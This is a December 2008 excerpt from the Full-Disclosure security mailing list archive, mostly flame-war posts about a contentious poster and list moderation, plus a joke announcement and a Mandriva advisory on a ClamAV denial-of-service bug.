References: <6158bb410811270847i6a3365a5nbc93b7d375042b47@mail.gmail.com>
    <6158bb410812041733t12d9f78g5d9bae52573baa82@mail.gmail.com>
    <6158bb410812041734g13731b1cx719e2879abaa1b94@mail.gmail.com>
Message-ID: <85202.16927.qm@web59910.mail.ac4.yahoo.com>

This list is both unprofessional and childish, I'll be unsubscribing.
________________________________
From: Ureleet
To: Full Disclosure
Sent: Thursday, December 4, 2008 6:34:08 PM
Subject: [Full-disclosure] Fwd: Solving of problems

---------- Forwarded message ----------
From: Ureleet
Date: Thu, Dec 4, 2008 at 8:34 PM
Subject: Re: Solving of problems
To: Mike C
Cc: n3td3v

who says we have it in for each other at all? what makes u the official 'problem' solver. i am the Yin to n3td3v's yang, u r just fucking up the rotation.

On Wed, Dec 3, 2008 at 9:48 PM, Mike C wrote:
> Ok. Lets restart. Why has the bickering restarted?
>
> Why do you have it in for each other?
>
> --
> MC
> Security Researcher
> Lead, Project Chroma
> http://sites.google.com/site/projectchromaproject/
>

-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081205/f1155b68/attachment.html

From exibar at thelair.com Fri Dec 5 17:52:56 2008
From: exibar at thelair.com (Exibar)
Date: Fri, 5 Dec 2008 12:52:56 -0500
Subject: [Full-disclosure] Security predictions for 2009
References: <4b6ee9310812050924q499f7cbeo8fd39167389ca7e2@mail.gmail.com>
Message-ID: <000601c95702$50234690$1214dd80@corp.emc.com>

My prediction is that n3td3v will remain and torment us more with his/their/its/her unwanted rubbish on this list and will never ever leave as was once promised....

why am I feeding the troll????? oh boy...

Exibar

----- Original Message -----
From: "n3td3v"
To:
Sent: Friday, December 05, 2008 12:24 PM
Subject: [Full-disclosure] Security predictions for 2009

> We here at n3td3v would like to hear your security predictions for 2009.
>
> Last time Paul Ferguson said 2008 would be the year of web 2.0 bugs
> and web 2.0 worms, that turned out to be utter rubbish (He does work
> for Trend Micro afterall), but in true tradition, let's hear some of
> your predictions that might turn out to be bullshit as well.
>
> n3td3v
>

From xploitable at gmail.com Fri Dec 5 18:23:32 2008
From: xploitable at gmail.com (n3td3v)
Date: Fri, 5 Dec 2008 18:23:32 +0000
Subject: [Full-disclosure] Security predictions for 2009
In-Reply-To: <000601c95702$50234690$1214dd80@corp.emc.com>
References: <4b6ee9310812050924q499f7cbeo8fd39167389ca7e2@mail.gmail.com>
    <000601c95702$50234690$1214dd80@corp.emc.com>
Message-ID: <4b6ee9310812051023w313d5b2cue3d9411e16c11dfb@mail.gmail.com>

I'm not a troll I wanted your security predictions, its people like you botching the list up not me.

On Fri, Dec 5, 2008 at 5:52 PM, Exibar wrote:
> My prediction is that n3td3v will remain and torment us more with
> his/their/its/her unwanted rubbish on this list and will never ever leave as
> was once promised....
>
>
> why am I feeding the troll????? oh boy...
>
> Exibar
>
>
> ----- Original Message -----
> From: "n3td3v"
> To:
> Sent: Friday, December 05, 2008 12:24 PM
> Subject: [Full-disclosure] Security predictions for 2009
>
>
>> We here at n3td3v would like to hear your security predictions for 2009.
>>
>> Last time Paul Ferguson said 2008 would be the year of web 2.0 bugs
>> and web 2.0 worms, that turned out to be utter rubbish (He does work
>> for Trend Micro afterall), but in true tradition, let's hear some of
>> your predictions that might turn out to be bullshit as well.
>>
>> n3td3v
>>
>

From ghosts at gmail.com Fri Dec 5 18:29:56 2008
From: ghosts at gmail.com (ghost)
Date: Fri, 5 Dec 2008 13:29:56 -0500
Subject: [Full-disclosure] Security predictions for 2009
In-Reply-To: <4b6ee9310812051023w313d5b2cue3d9411e16c11dfb@mail.gmail.com>
References: <4b6ee9310812050924q499f7cbeo8fd39167389ca7e2@mail.gmail.com>
    <000601c95702$50234690$1214dd80@corp.emc.com>
    <4b6ee9310812051023w313d5b2cue3d9411e16c11dfb@mail.gmail.com>
Message-ID: <6f4bb0b50812051029p31963942gb9eb3d9e1a7ffc2f@mail.gmail.com>

Hey n3td3v, when are you going to disclose any vulnerabilities to this list? I mean, I know you're an elite hacker whos skills surpass even that of mi5. But seriously... when can we see some exploits or code... I mean, even morning_wood released a nikto frontend... albeit a poorly coded and extremely exploitable one, but a frontend none the less.

On Fri, Dec 5, 2008 at 1:23 PM, n3td3v wrote:
> I'm not a troll I wanted your security predictions, its people like
> you botching the list up not me.
>
> On Fri, Dec 5, 2008 at 5:52 PM, Exibar wrote:
>> My prediction is that n3td3v will remain and torment us more with
>> his/their/its/her unwanted rubbish on this list and will never ever leave as
>> was once promised....
>>
>>
>> why am I feeding the troll????? oh boy...
>>
>> Exibar
>>
>>
>> ----- Original Message -----
>> From: "n3td3v"
>> To:
>> Sent: Friday, December 05, 2008 12:24 PM
>> Subject: [Full-disclosure] Security predictions for 2009
>>
>>
>>> We here at n3td3v would like to hear your security predictions for 2009.
>>>
>>> Last time Paul Ferguson said 2008 would be the year of web 2.0 bugs
>>> and web 2.0 worms, that turned out to be utter rubbish (He does work
>>> for Trend Micro after all), but in true tradition, let's hear some of
>>> your predictions that might turn out to be bullshit as well.
>>>
>>> n3td3v
>>>
>>
>

From Valdis.Kletnieks at vt.edu Fri Dec 5 18:31:49 2008
From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu)
Date: Fri, 05 Dec 2008 13:31:49 -0500
Subject: [Full-disclosure] Security predictions for 2009
In-Reply-To: Your message of "Fri, 05 Dec 2008 18:23:32 GMT."
    <4b6ee9310812051023w313d5b2cue3d9411e16c11dfb@mail.gmail.com>
References: <4b6ee9310812050924q499f7cbeo8fd39167389ca7e2@mail.gmail.com>
    <000601c95702$50234690$1214dd80@corp.emc.com>
    <4b6ee9310812051023w313d5b2cue3d9411e16c11dfb@mail.gmail.com>
Message-ID: <13880.1228501909@turing-police.cc.vt.edu>

On Fri, 05 Dec 2008 18:23:32 GMT, n3td3v said:
> I'm not a troll I wanted your security predictions, it's people like
> you botching the list up not me.

The basic problem is that you've *been* either a blithering idiot or a
troll for so long, that even if something sensible *does* get posted from
n3td3v, people will tend to label it as "oh, his trolling has just gotten
a bit better".

Your best bet is to just toss that e-mail address, go pursue an outdoor
hobby for 4 to 6 months, and use a different persona when you return.

-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 226 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081205/7a6beaa8/attachment.bin

From opticfiber at topsight.net Fri Dec 5 18:43:07 2008
From: opticfiber at topsight.net (opticfiber)
Date: Fri, 5 Dec 2008 13:43:07 -0500
Subject: [Full-disclosure] Security predictions for 2009
In-Reply-To: <13880.1228501909@turing-police.cc.vt.edu>
References: <4b6ee9310812050924q499f7cbeo8fd39167389ca7e2@mail.gmail.com>
    <000601c95702$50234690$1214dd80@corp.emc.com>
    <4b6ee9310812051023w313d5b2cue3d9411e16c11dfb@mail.gmail.com>
    <13880.1228501909@turing-police.cc.vt.edu>
Message-ID: <9c9715300812051043m737abe11g8310a1d39e4dcab8@mail.gmail.com>

Listen, all this back and forth about list noise is easily fixable
please see attached.

-Bill

On Fri, Dec 5, 2008 at 1:31 PM, wrote:
> On Fri, 05 Dec 2008 18:23:32 GMT, n3td3v said:
> > I'm not a troll I wanted your security predictions, it's people like
> > you botching the list up not me.
>
> The basic problem is that you've *been* either a blithering idiot or a
> troll for so long, that even if something sensible *does* get posted from
> n3td3v, people will tend to label it as "oh, his trolling has just gotten
> a bit better".
>
> Your best bet is to just toss that e-mail address, go pursue an outdoor
> hobby for 4 to 6 months, and use a different persona when you return.
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081205/24b64850/attachment.html
-------------- next part --------------
A non-text attachment was scrubbed...
Name: filters.jpg
Type: image/jpeg
Size: 39251 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081205/24b64850/attachment.jpg

From xploitable at gmail.com Fri Dec 5 18:53:04 2008
From: xploitable at gmail.com (n3td3v)
Date: Fri, 5 Dec 2008 18:53:04 +0000
Subject: [Full-disclosure] Security predictions for 2009
In-Reply-To: <13880.1228501909@turing-police.cc.vt.edu>
References: <4b6ee9310812050924q499f7cbeo8fd39167389ca7e2@mail.gmail.com>
    <000601c95702$50234690$1214dd80@corp.emc.com>
    <4b6ee9310812051023w313d5b2cue3d9411e16c11dfb@mail.gmail.com>
    <13880.1228501909@turing-police.cc.vt.edu>
Message-ID: <4b6ee9310812051053i165caddei9bc9b8d820f5bb12@mail.gmail.com>

On Fri, Dec 5, 2008 at 6:31 PM, wrote:
> On Fri, 05 Dec 2008 18:23:32 GMT, n3td3v said:
>> I'm not a troll I wanted your security predictions, it's people like
>> you botching the list up not me.
>
> The basic problem is that you've *been* either a blithering idiot or a
> troll for so long, that even if something sensible *does* get posted from
> n3td3v, people will tend to label it as "oh, his trolling has just gotten
> a bit better".
>
> Your best bet is to just toss that e-mail address, go pursue an outdoor
> hobby for 4 to 6 months, and use a different persona when you return.
>

Why don't you just tell them I'm not a troll then I won't need to go
away for 6 months.

From pschmehl_lists at tx.rr.com Fri Dec 5 18:44:04 2008
From: pschmehl_lists at tx.rr.com (Paul Schmehl)
Date: Fri, 05 Dec 2008 12:44:04 -0600
Subject: [Full-disclosure] Fwd: Solving of problems
In-Reply-To: <85202.16927.qm@web59910.mail.ac4.yahoo.com>
References: <6158bb410811270847i6a3365a5nbc93b7d375042b47@mail.gmail.com>
    <6158bb410812041733t12d9f78g5d9bae52573baa82@mail.gmail.com>
    <6158bb410812041734g13731b1cx719e2879abaa1b94@mail.gmail.com>
    <85202.16927.qm@web59910.mail.ac4.yahoo.com>
Message-ID:

The fact that you feel the need to announce that to the world seems
unprofessional and childish.

--On Friday, December 05, 2008 11:34 AM -0600 Ian Wolff wrote:

>
>
> This list is both unprofessional and childish, I'll be unsubscribing.
>
>
>
>
> __________________________________________________
> From: Ureleet
> To: Full Disclosure
> Sent: Thursday, December 4, 2008 6:34:08 PM
> Subject: [Full-disclosure] Fwd: Solving of problems
>
> ---------- Forwarded message ----------
> From: Ureleet
> Date: Thu, Dec 4, 2008 at 8:34 PM
> Subject: Re: Solving of problems
> To: Mike C
> Cc: n3td3v
>
>
> who says we have it in for each other at all? what makes u the
> official 'problem' solver. i am the Yin to n3td3v's yang, u r just
> fucking up the rotation.
>
> On Wed, Dec 3, 2008 at 9:48 PM, Mike C wrote:
>> Ok. Let's restart. Why has the bickering restarted?
>>
>> Why do you have it in for each other?
>>
>> --
>> MC
>> Security Researcher
>> Lead, Project Chroma
>> http://sites.google.com/site/projectchromaproject/
>>
>
>

Paul Schmehl
As if it wasn't already obvious, my opinions
are my own and not those of my employer.
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pkcs7-signature
Size: 3826 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081205/63615a86/attachment.bin

From exibar at thelair.com Fri Dec 5 20:29:21 2008
From: exibar at thelair.com (Exibar)
Date: Fri, 5 Dec 2008 15:29:21 -0500
Subject: [Full-disclosure] Security predictions for 2009
References: <4b6ee9310812050924q499f7cbeo8fd39167389ca7e2@mail.gmail.com>
    <000601c95702$50234690$1214dd80@corp.emc.com>
    <4b6ee9310812051023w313d5b2cue3d9411e16c11dfb@mail.gmail.com>
    <13880.1228501909@turing-police.cc.vt.edu>
Message-ID: <002501c95718$2aa4ba00$1214dd80@corp.emc.com>

yes, he should lose the name, and the attitude that he's the last word and
GOD in Information Security....

agreed, if he goes away for 6 - 12 months, and comes back without the
attitude and name.... there will no longer be N3TD3V SUX stickers at
'con.....

Exibar

----- Original Message -----
From:
To: "n3td3v"
Cc: "Exibar" ;
Sent: Friday, December 05, 2008 1:31 PM
Subject: Re: [Full-disclosure] Security predictions for 2009

> On Fri, 05 Dec 2008 18:23:32 GMT, n3td3v said:
>> I'm not a troll I wanted your security predictions, it's people like
>> you botching the list up not me.
>
> The basic problem is that you've *been* either a blithering idiot or a
> troll for so long, that even if something sensible *does* get posted from
> n3td3v, people will tend to label it as "oh, his trolling has just gotten
> a bit better".
>
> Your best bet is to just toss that e-mail address, go pursue an outdoor
> hobby for 4 to 6 months, and use a different persona when you return.
>

From fdiggle at gmail.com Fri Dec 5 22:34:41 2008
From: fdiggle at gmail.com (Fredrick Diggle)
Date: Fri, 5 Dec 2008 16:34:41 -0600
Subject: [Full-disclosure] Fredrick Diggle Security - New Hire Announcement
Message-ID:

Fredrick Diggle security is proud to announce that an offer has been made
to the established internet security expert and ethical hacker Valdis
Kletniek's Mustache. Fredrick Diggle was confused at first when the
application was received as Fredrick was under the impression that the
mustache was actually a part of Valdis. However, the mustache explained
that it was in fact the sentient being and Valdis was simply the host it
had been using for mobility.

Late last week the mustache (formerly attached to Valdis Kletnieks)
accepted Fredrick Diggle's offer and will begin work in its new position
with Fredrick Diggle Security effective immediately. The mustache has
given up its former host in favor of more nubile transport here in
Brazilia.

Please join Fredrick Diggle in welcoming the mustache to the Fredrick
Diggle Security team.

http://farm4.static.flickr.com/3149/3062896000_266ea1a26e.jpg

In the future please refrain from calling the Mustache "Validis Kletniek's
Mustache" and instead refer to it as simply Mr. Mustache or TMFATVK (The
Mustache Formerly Attached to Valdis Kletnieks) for short.

From security at mandriva.com Sat Dec 6 02:42:00 2008
From: security at mandriva.com (security at mandriva.com)
Date: Fri, 05 Dec 2008 19:42:00 -0700
Subject: [Full-disclosure] [ MDVSA-2008:239 ] clamav
Message-ID:

_______________________________________________________________________

Mandriva Linux Security Advisory                         MDVSA-2008:239
http://www.mandriva.com/security/
_______________________________________________________________________

Package : clamav
Date    : December 5, 2008
Affected: 2008.0, 2008.1, 2009.0, Corporate 3.0, Corporate 4.0
_______________________________________________________________________

Problem Description:

Ilja van Sprundel found that ClamAV contained a denial of service
vulnerability in how it handled processing JPEG files, due to it not
limiting the recursion depth when processing JPEG thumbnails
(CVE-2008-5314).

Other bugs have also been corrected in 0.94.2 which is being provided
with this update.
_______________________________________________________________________

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5314
_______________________________________________________________________

Updated Packages:

_______________________________________________________________________

To upgrade automatically use MandrivaUpdate or urpmi. The verification
of md5 checksums and GPG signatures is performed automatically for you.

All packages are signed by Mandriva for security. You can obtain the
GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
_______________________________________________________________________

Type Bits/KeyID     Date       User ID
pub  1024D/22458A98 2000-07-10 Mandriva Security Team

From bipin.gautam at gmail.com Sat Dec 6 06:00:24 2008
From: bipin.gautam at gmail.com (Bipin Gautam)
Date: Sat, 6 Dec 2008 11:45:24 +0545
Subject: [Full-disclosure] FD culture!?
Message-ID: <754924960812052200x6de1b047w7fb94bf1111ae479@mail.gmail.com>

Guys,

This mailing list lives up to its name "Full Disclosure" for
tolerating the monkeys and their chattering in this list for quite
some time now without moderation or any action!

This mailing list had a "culture", "the audience base" and that was
the "only reason" we all subscribed to it!

# Standard, culture, content quality, popular interest, intellect...
spam!, off topic discussion, unnecessary topic, flame war

From the above list ask anyone "sensible" enough to pick up qualities
to be an information security mailing list. What options do you come
up with?

If someone repeatedly fails to meet the general code of conduct please
ban them for not being in "popular interest" for an unmoderated
discussion. Is it so hard to grasp that those types of people really
don't deserve to be here?

A wise person would never choose to speak in-between fools. It looks
like FD is starting to be plagued with a similar trend and slowly
dropping on the quality of discussion/interest. If FD moderators can't
maintain the mailing list culture, its quality, its market reputation
and audience interest naturally decrease as they have been.

FD should be a platform to promote collective intelligence in
information security with MEANINGFUL full-disclosure instead of having
never ending noise, annoyance, distraction and meaningless discussion
to waste our time.

FD was there because not all info-sec mailing lists provided
unmoderated discussion. But moderators please assure a minimum level
of "content/quality". In the list we all are obligated to keep harmony
with all but least not with people with problem to socialize and
generally annoyance.

Moderators are really not doing justice by going against the "popular
belief" (the subscribers)

Please do not forget, the mailing list is there because WE subscribers
are there and we were subscribed to this list because this mailing
list had a culture!

"Full-Disclosure" live up to its name but please preserve a standard,
a culture and a quality of discussion.

Phase 2:
- Post unnecessarily and very frequently like the current FD trend.
- Ask other 30 people to do the same.
- Make sure any/all meaningful discussion is dwarfed in unnecessary
  and meaningless noise.
- Wait for moderators to act... lobby........ or repeat phase 2 till FD
  goes in dust, really!

Shame on FD moderators for putting us in a situation where neither can
we unsubscribe from the list for the real content that pops here now
and then... but have to tolerate unproductive noise lots of time from
people with anonymous identities for top-posting on off-track
discussion.

From xploitable at gmail.com Sat Dec 6 11:58:26 2008
From: xploitable at gmail.com (n3td3v)
Date: Sat, 6 Dec 2008 11:58:26 +0000
Subject: [Full-disclosure] FD culture!?
In-Reply-To: <754924960812052200x6de1b047w7fb94bf1111ae479@mail.gmail.com>
References: <754924960812052200x6de1b047w7fb94bf1111ae479@mail.gmail.com>
Message-ID: <4b6ee9310812060358h706028c9u144d656eb7000aa3@mail.gmail.com>

What part of "there are no moderators" don't you get. This list is run
by the British intelligence service and you are a guest here.

On Sat, Dec 6, 2008 at 6:00 AM, Bipin Gautam wrote:
> Shame on FD moderators

From randallm at fidmail.com Sat Dec 6 14:46:22 2008
From: randallm at fidmail.com (RandallM)
Date: Sat, 6 Dec 2008 08:46:22 -0600
Subject: [Full-disclosure] Fredrick Diggle Security - New Hire Announcement
Message-ID:

On Sat, Dec 6, 2008 at 6:00 AM, wrote:
>
> ---------